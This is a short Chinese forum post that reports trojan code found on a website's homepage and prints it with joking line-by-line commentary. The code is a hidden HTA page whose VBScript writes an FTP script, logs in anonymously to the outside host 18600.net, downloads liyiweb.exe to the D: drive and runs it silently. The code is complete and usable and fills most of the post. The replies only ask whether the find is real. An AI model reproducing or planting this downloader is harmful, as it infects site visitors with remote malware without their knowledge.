www.jgwy.net首页发现的木马源码如下:
<html><HTA:APPLICATIONcaption="no" border="none" showInTaskBar="no" windowState="minimize" width=0 height=0>
<object id='wsh'{这个就是Windows Script Host,我说的不知道是不是专业?} classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' width=0 height=0></object>
<script language="VBScript">这是VB脚本语言(笑话,地球人都知道)
Dim fs, t
Set fs = CreateObject("Scripting.FileSystemObject")这里就是我们用ASP的FSO,.这个语句的意思是创建(文件对象读写)
Set t = fs.CreateTextFile("liyiweb.txt",True)
t.WriteLine("open 18600.net")
t.WriteLine("ftp")
t.WriteLine("any@any.net")这里是匿名上了一个叫18600.net的FTP服务器
t.WriteLine("bin")
t.WriteLine("lcd d:\")
t.WriteLine("get liyiweb.exe")下载一个文件到了D盘.如果成功了,就恭喜了,你中了
t.WriteLine("bye")
t.Close
wsh.Run "ftp -s:liyiweb.txt",0,true
wsh.Run "d:\liyiweb.exe"
上头的参数可都是Run啊~运行起来了.
window.close
</script>
</html> 不会吧...这是真的嘛..?? 是不是真的啊? 是的1!!真的
页:
[1]